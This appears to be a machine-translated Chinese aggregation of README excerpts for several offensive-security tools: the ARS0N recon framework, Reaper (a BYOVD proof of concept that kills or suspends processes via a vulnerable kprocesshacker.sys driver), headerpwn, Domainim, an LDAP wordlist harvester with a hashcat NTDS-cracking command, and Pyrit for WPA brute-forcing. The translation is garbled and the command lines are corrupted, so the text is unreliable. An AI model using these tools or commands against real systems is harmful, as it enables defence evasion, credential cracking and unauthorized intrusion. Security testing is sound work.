ARS0N框架的子模块设计为将核心模块利用,以将重枚举阶段分为特定任务。每个子模块中收集的数据都被其他人用于扩展目标攻击表面的图片。

火 - 启动器

Fire-Starter是针对目标域进行侦察的第一步。该脚本的目的是收集有关目标攻击表面的大量信息。一旦收集,所有其他子模块都将使用此数据来帮助用户识别潜在脆弱的特定URL。

启动器可以通过运行一系列开源工具来列举隐藏的子域,DNS记录和ASN来确定这些外部条目托管的位置。目前,通过将以下使用以下广泛使用的开源工具链接在一起的工程:

Amass Sublist3R AssetFinder获取所有URL(GAU)证书透明度日志(CRT)子发现式Shuffledns Gospider子域启动器这些工具涵盖了广泛的技术,可以识别隐藏的子域,包括网络刮擦,蛮力,蛮力,爬行以识别链接和Javascript urls和Javascript url。

扫描完成后,将更新仪表板并向用户使用。 ARS0N框架中的大多数子模块都需要从火启动器模块收集的数据才能工作。考虑到这一点,必须将火启动器包括在第一次扫描中,以针对要收集的任何可用数据的目标。

fire-loud

即将推出.

fire-scanner

Fire-Scanner使用Fire-Starter和Fire-Cloud的结果对以前扫描中发现的所有子域和云服务进行宽带扫描。

在开发的这个阶段,该脚本几乎完全利用核几乎所有扫描。消防员不简单地运行该工具,而是将扫描分解为特定的核模板集合,并一一扫描它们。此策略有助于确保扫描稳定并产生一致的结果,消除任何不必要或不安全的扫描检查,并产生可行的结果。

故障排除

绝大多数安装和/或运行ARS0N框架的问题是由于没有在卡利Linux的清洁安装上安装工具而引起的。

重要的是要记住,从本质上讲,ARS0N框架是旨在运行现有开源工具的自动化脚本集合。这些工具中的每一个都有自己的操作方式,如果与用户系统上运行的任何现有服务/工具发生冲突,则可以体验意外的行为。这种复杂性是如何仅在卡利linux的清洁安装上运行ARS0N框架的原因。用户经历的另一个非常常见的问题是MongoDB未成功安装和/或在其计算机上运行。此问题最常见的表现是用户无法添加初始FQDN,而只是看到损坏的GUI。如果发生这种情况,请确保您的机器有运行MongoDB的必要系统要求。不幸的是,如果您遇到此问题,目前没有目前的解决方案。

常见问题

即将推出.

AVvXsEi5CKhup62kzvQ8kPJV5QaUXt7MRtL1eWNP

收割者是旨在利用Byovd(带来自己脆弱的驱动程序)驾驶员漏洞的概念验证。这种恶意技术涉及将合法易受伤害的驱动程序插入目标系统,这使攻击者可以利用驾驶员执行恶意行动。

Reaper的设计专门用于利用2.8.0.0版本中kprocesshacker.sys驱动程序中存在的漏洞,利用其弱点来获得对目标系统的特权访问和控制。

Note:收割机不会杀死Windows Defender进程,因为它具有保护,收割者是一个简单的概念证明。

功能

杀戮过程暂停过程

帮助

____

/__ \ ____ _____ _____ _______

//_//_ \/__/__/__ \/_ \/___//___/

/_,_/__//_////_///__//////

/_/| _ | \ ___/\ __,_/.___/\ ___/\ __/\ __/

/_/

[由Mrempy编码]

[V1.0]

USAGE: C: \ Windows \ temp \ receper.exe [options] [values]

Options:

SP,暂停过程

KP,杀死过程

值:

ProcessID过程ID暂停/杀死

示例:

Reaper.EXE SP 1337

Reaper.exe KP 1337

演示

AVvXsEgxFzjRgODMciGXX1-RFpUD8M_SAAQ_IxYj

安装

您可以直接从源代码进行编译或下载已经编译的。您将需要Visual Studio 2022进行编译。

Note:可执行文件和驱动程序必须在同一目录中。

AVvXsEjhw6Ly6CcuMkIDFVTdlCSSg_hS_Ot05XtP

安装

要安装headerPWN,运行以下命令:

Go nistal install github.com/devanshbatham/[EmailPretected]

用法

HeaderPWN允许您在目标URL上测试各种标头并分析响应。这是使用工具:的方法

使用-URL标志提供目标URL。创建一个包含您要测试的标头的文件,每行一个标头。使用-headers标志指定该文件的路径。示例用法:

headerpwn -url https://example.com -headers my_headers.txt格式my_headers.txt应该像: proxy -authenticate: foobar

代理人授权- 重新获得: Foobar

代理人授权: Foobar

代理连接: Foobar

代理人-Host: Foobar

代理-HTTP: Foobar

通过Burp Suite的代理请求:

以下步骤通过Burp Suite :

出口Burp的证书:

在Burp Suite中,转到“代理”标签。在“代理侦听器”部分下,选择为127.0.0.0.1:8080配置的侦听器单击“导入/导出CA证书”按钮。在证书窗口中,单击“导出证书”,然后保存证书文件(例如Burp.der)。安装Burp的证书:

将导出的证书安装为系统上的信任证书。您如何做到这取决于您的操作系统。在Windows上,您可以双击.cer文件并按照提示将其安装在“受信任的根认证机构”商店中。在MACOS上,您可以双击.cer文件,然后将其添加到“系统”键链中的“钥匙扣访问”应用程序中。在Linux上,您可能需要将证书复制到受信任的证书位置并配置您的系统以信任它。你应该全部set:

HeaderPWN -URL https://Example.com -headers my_headers.txt -proxy 127.0.0.0.1:8080 AVvXsEgwVIpieddO9Sp0aDhvyQWCiz7eyYjWgq7U

AVvXsEjELw64soIQatf8BVfeQfZu_Yzhp-MhlL8n

信用

headers.txt文件来自各种来源,包括秘书的销售项目。这些标头用于测试目的,并提供了各种方案,以分析服务器对不同标题的响应。

Domainim是用于组织网络扫描的快速域侦察工具。该工具旨在简要概述使用Osint,Bruteforcing,DNS Resolvation等技术,概述组织的结构。

功能

当前功能(v1.0.1) - 子域枚举(2个引擎+ bruteforcing) - 用户友好的输出- 解决记录(IPv4)

A fast and comprehensive tool for organizational network scanning (6)

A fast and comprehensive tool for organizational network scanning (7)

虚拟主机名枚举反向DNS查找A fast and comprehensive tool for organizational network scanning (8)

检测通配符子域(用于蛮力)A fast and comprehensive tool for organizational network scanning (9)

基本的TCP端口扫描子域被接受为输入A fast and comprehensive tool for organizational network scanning (10)

导出结果到JSON文件A fast and comprehensive tool for organizational network scanning (11)

有一些功能正在进行中。有关更多详细信息,请参见计划的功能。

该项目的灵感来自Sublist3r。端口扫描仪模块基于NIMSCAN。

安装

您可以从Source-克隆存储库中构建此仓库

git克隆[emailProtected] :pptx704/domainim构建二进制敏捷构建运行二进制二进制./domainim域[ - ports=ports],或者,您只需从发布页面下载二进制文件即可。请记住,仅对基于Debian的系统对二进制进行测试。

用法

./domainim域[-ports=端口| -p:ports] [-wordlist=filename | l:fileName [-rps=int | -r:int]] [-dns=dns | -d:dns] [-out=filename | -O:fileName]域是要枚举的域。它也可以是一个子域。 - 端口| -p是要扫描的端口的字符串规范。它可以是以下- 全部- 扫描所有端口(1-65535)无- 跳过端口扫描(默认)TN -scan -scan tn -top n端口(与NMAP相同)。即T100扫描前100个端口。最大值为5000。如果n大于5000,则将设置为5000。单个值- 扫描单个端口。即80扫描端口80范围值- 扫描一系列端口。即80-100扫描端口80至100逗号分隔值- 扫描多个端口。即80,443,8080扫描端口80,443和8080组合- 扫描上述组合。即80,443,8080-8090,T500扫描端口80,443,8080至8090和前500个端口-DNS | -d是DNS服务器的地址。这应该是有效的IPv4地址,并且可以选择包含端口号A.B.C.D-在端口53 A.B.C.D#N上使用A.B.C.D的DNS服务器- 在端口e -onderlist上使用A.B.C.D使用DNS Server | -l- WordList文件的路径。这用于蛮力子域。如果文件无效,则将跳过蛮力。您可以从秘书中获得单词列表。发行页中还提供了单词列表。 -rps | -r-蛮力期间每秒提出的请求数。默认值为1024 req/s。值得注意的是,DNS查询是分批进行的,仅在上一个完成后才进行下一个批次。由于Quries可以受到限制,因此增加值并不总是保证更快的结果。 - 出口| -o-输出文件的路径。输出将以JSON格式保存。文件名必须以.json结尾。 Examples - ./domainim nmap.org --ports=all - ./domainim google.com --ports=none --dns=8.8.8.8#53 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt -outFile=results.json-- ./domainim mysite.com -ports=t50,5432,7000-9000 -dns=1.1.1.1.1

可以使用./domainim -help或./domainim -h访问帮助菜单。

用法:

domainim域[-ports=端口| -p:ports] [-wordlist=fileName | l:fileName [-rps=int | -R:INT]] [-DNS=DNS | -d:dns] [-out=filename | -O:FileName]

domainim(-h | -help)

Options:

-h, - 螺旋显示此屏幕。

-p, - 端口端口进行扫描。 [default:`none']

可以是``all',`n',`tn',单个值,范围值,组合

-l, - 子域bruteforcing的词列表列表。突袭被跳过无效的文件。

-d, - DNS IP和DNS解析器的端口。应该是具有可选端口的有效IPv4 [Default:系统默认]

-r,-rps DNS查询每秒[default: 1024 req/s]

-o, - 输出JSON文件,将保存输出。文件名必须以“ .json”结尾

示例:

domainim domainim.com -p:t500 -l:wordlist.txt -dns:1.1.1.1.1#53 -ET=results.json

domainim sub.domainim.com -ports=all -dns:8.8.8.8 -t:1500 -O3:Results.json结果json schema的结果如下-

[

{

'subdomain':字符串,

'data': [

'ipv4':字符串,

'vhosts': [string],

'reverse_dns':字符串,

'ports': [int]

这是给出的

}

]可以在此处找到nmap.org的示例JSON。

欢迎

贡献

捐款。随时打开拉动请求或问题。

计划的功能

[x] TCP端口扫描[] UDP端口扫描支持[]解决AAAA记录(IPV6)[X]自定义DNS Server [X]使用WordList [] force ofert force bruteforcruction添加bruteForcorings [] DIR和文件拆除

其他人

[X]遇到错误(v0.2.0)[X]更新详细输出[x]显示了更长的操作的进度栏[]添加单个端口扫描进度栏[]添加测试[]添加测试[]添加注释和DocStrings

其他注释

此项目仍然处于早期阶段。我知道有几个局限性。

我正在使用的两个引擎(我称它们为引擎,因为Sublist3R这样做)当前具有某种响应限制。 dnsdumpster.com'dnsdumpster最多可以获取100个子域。 CRT.SH还会在结果过多的情况下随机将结果随机。 CRT.SH的另一个问题是,它有时会返回一些SQL错误。因此,对于某些域,对于不同的运行,结果可能会有所不同。我计划将来添加更多引擎(至少是蛮力引擎)。

端口扫描仪仅具有PING响应时间+ 750ms超时。这可能会导致虚假负面因素。由于Domainim并非用于端口扫描,而是为了提供快速概述,因此可以接受此类情况。但是,我计划添加一个标志来增加超时。出于同样的原因,未显示过滤的端口。对于更全面的端口扫描,我建议使用NMAP。 Domainim也不会绕过率限制(如果有的话)。

看来Vhostnames的打印方式似乎在桌子上带来了重新估计。

A fast and comprehensive tool for organizational network scanning (12)

以下印刷可能是更好的-

ack.nmap.org,essess.nmap.org,nmap.org,research.nmap.org,scannme.nmap.org,svn.nmap.org,www.nmap.org

↳45.33.49.119

↳反向DNS: ack.nmap.org。但是以前在测试时,我发现并非所有IP都通过相同的VhostNames共享。这就是为什么我决定以这种方式保持它的原因。

A fast and comprehensive tool for organizational network scanning (13)

DNS服务器可能具有某种限制速率。这就是为什么我为每个查询的IPv4添加随机延迟(在0-300ms之间)。这是不是要使DNS服务器立即获得所有查询,而是以更自然的方式获取所有查询。对于ButeForcing方法,默认情况下该值在0-1000ms之间,但可以使用-rps |可以更改该值。 -t标志。

困扰我的一个特殊限制是,DNS解析器不会将所有IP返回一个域。因此,有必要进行多个查询以获取全部(或大多数)IPS。但是话又说回来,不可能知道有多少个IP的域名。我仍然必须为此提出解决方案。另外,NIM-NDNS不支持CNAME记录。因此,如果域具有CNAME记录,将无法解决。我正在等待作者的回应。

目前,如果发现可能的通配符子域,则会跳过蛮力。这是因为,如果一个域具有通配符子域,则BruteForcing将解决所有可能的子域的IPv4。但是,这也会跳过有效的子域(即,即使不是通配符值,也会跳过scanme.nmap.org)。我将添加一个- 野蛮人| -fb旗以后迫使爆炸。

对于子域输入的VHOST枚举也是如此。由于以给定子域结束的URL返回,因此不考虑类似域的子域。例如,scannme.nmap.org不会为ack.nmap.org打印,而是可能是ack.nmap.org。我可以搜索nmap.org的所有子域,但这却打败了将子域作为输入的目的。

许可证

MIT许可证。有关全文,请参见许可证。

AVvXsEhsaXBlrZ6Sa5J3FAk-98tiDMfF8P4t0ZKm

为了破解域帐户的非随机密码,一种从LDAP中存在的信息生成单词列表的工具。

功能

域越大,单词列表越好。

[x]根据LDAP: [x]用户:名称和samaccountName [x] Computer:名称和SamacCountName [X]组:名称[X] NAME [X]组织单位:名称[X]活跃目录Defips:名称和描述X x x :名称[x], [x]选择带有选项的WordList输出文件名- OutputFile

演示

从域域的LDAP生成WordList。

./ldapwordlistharvester.py -d'domain.local'-u'takistricator'-p'p'p@ssw0rd123!' -DC-IP 192.168.1.101如果使用Python版本:您将获得以下输出

AVvXsEgUT0W77ysJWBttMUbgcF5OeyKRLifUF2fa

如果使用PowerShell版本:您将获得以下输出

AVvXsEi-v3bQRrlRm6endSzDpIG6Fbi0S6wo2HuE

破解密码

拥有此WordList后,应该使用HashCat,-loopback和规则CLEM9669_LARGE.RULE破解NTD。

./hashcat -hash-type 1000 -potfile-path ./client.potfile ./client.ntds ./wordlist.txt -rules ./clem9669_large.rule-loopback -loopback 3:0101

用法

ldapwordlistharvester.py v1.1- @podalirius_

usage: ldapwordlistharvester.py [-h] [-v] [-o outputfile] -dc-ip ip地址[-d域] [-u用户] [-ldaps] [-ldaps] [-no-pass | -p密码| -h [lmhash:] nthash | - AES-KEY HEX KEY] [-K]

Options:

-h, - 赫尔普显示此帮助消息和退出

-v, - verbose详细模式。 (Default: false)

-o outputfile,-antputfile outputfile

通往WordList输出文件的路径。

身份验证连接:

-DC-IP IP地址域控制器的IP地址或KERBEROS的KDC(键配电中心)。如果省略,它将使用身份参数中指定的域部分(FQDN)

-d域, - 域域

(fqdn)域进行身份验证

-u用户- 用户用户可以通过

-LDAPS使用LDAP而不是LDAP

凭证:

- 非通行证请勿要求密码(对-K有用)

-p密码, - password密码

密码可以进行身份验证

-h [lmhash:] nthash, - 哈什[lmhash:] nthash

nt/lm哈希,格式是lmhash:nthash

- AES-KEY HEX密钥AES键可用于Kerberos身份验证(128或256位)

-K, - Kerberos使用Kerberos身份验证。根据目标参数从.ccache文件(KRB5CCNAME)获取凭据。如果找不到有效的凭据,它将使用命令行中指定的凭据

AVvXsEjTs6Jihkv0x9-GGJM36Uehcq8F9ipCvyID

pyrit允许您在时空交易中创建预计WPA/WPA2-PSK身份验证阶段的大规模数据库。通过使用ATI-Stream,Nvidia Cuda和Opencl使用多核CPU和其他平台的计算能力,它目前是迄今为止对世界上最常用的安全性协议之一的最强大攻击。

WPA/WPA2-PSK是IEEE 802.11 WPA/WPA2的子集,它通过将每个参与方分配相同的PRE共享密钥来跳过密钥分布和客户端身份验证的复杂任务。此主密钥是从管理用户必须预先配置的密码中得出的。在他的笔记本电脑和访问点上。当笔记本电脑创建与接入点的连接时,将从主密钥中派生一个新的会话密钥,以加密和真实的流量。使用单个主密钥而不是使用单用户键的“快捷方式”简化了WPA/WPA2保护网络的部署,用于家庭和小型办公室使用,以使该协议容易受到针对其密钥谈判阶段的暴力攻击的代价;它允许最终揭示保护网络的密码。由于协议允许大部分键推导是预先计算的,因此这种漏洞必须被视为异常灾难性,从而使简单的蛮力攻击更加诱人。有关更多背景,请参见有关项目博客(过时)上的本文。

作者不鼓励或支持使用pyrit来侵犯人民的交流私人关系。这里讨论的技术的探索和实现是作为自己的目的而激励的;这是由开放开发,严格的基于源代码的分布和“ copyleft”许可的记录。

pyrit是免费的软件- 自由中的免费软件。每个人都可以根据GNU通用公共许可证v3+进行检查,复制或修改并共享派生的工作。它在多种平台上编译并执行,包括FreeBSD,MacOS X和Linux作为操作系统以及X86-,Alpha-,Arm-,Hppa-,Mips-,PowerPC-,S390和Sparc Procoressors。

通过蛮力攻击WPA/WPA2,归结为尽可能快地计算成对主键。每个成对主密钥都恰恰是“值得”的一个兆字节,可以通过PBKDF2-HMAC-SHA1推出。反过来,计算每秒10.000 pmks等同于一秒钟内用SHA1的哈希9,8千兆字节。

这些是多个计算节点如何通过Pyrit:提供的各种方式访问单个存储服务器的示例

单个存储(例如,MySQL-Server)一个本地网络,该网络可以直接访问存储服务器,并在各个级别上提供四个计算节点,而只有一个节点实际访问了存储服务器本身。另一个不信任的网络可以通过pyrit的RPC接口访问存储,并提供三个计算节点,其中两个实际上访问了RPC接口。

什么是新的

Fixed #479 and #481 Pyrit CUDA now compiles in OSX with Toolkit 7.5 Added use_CUDA and use_OpenCL in config file Improved cores listing and managing limit_ncpus now disables all CPUs when set to value=0 Improve CCMP packet identification, thanks to yannayl See CHANGELOG file for a better description.

如何使用

Pyrit编译并在Linux,MacOS X和BSD上运行良好。我不在乎窗户;如果您在不复制GNU的一半的情况下使我的线路工作起作用,请给我一条线(read:补丁).在Wiki中可以找到在系统上安装pyrit的指南。还有一个命令行- 委托人的教程和参考手册。

如何参与

如果有兴趣将pyrit移植到新的硬件平台,则可能需要阅读此Wiki-entry。贡献或错误报告您应该[提交问题](https://github.com/jpaulmora/pyrit/issues)。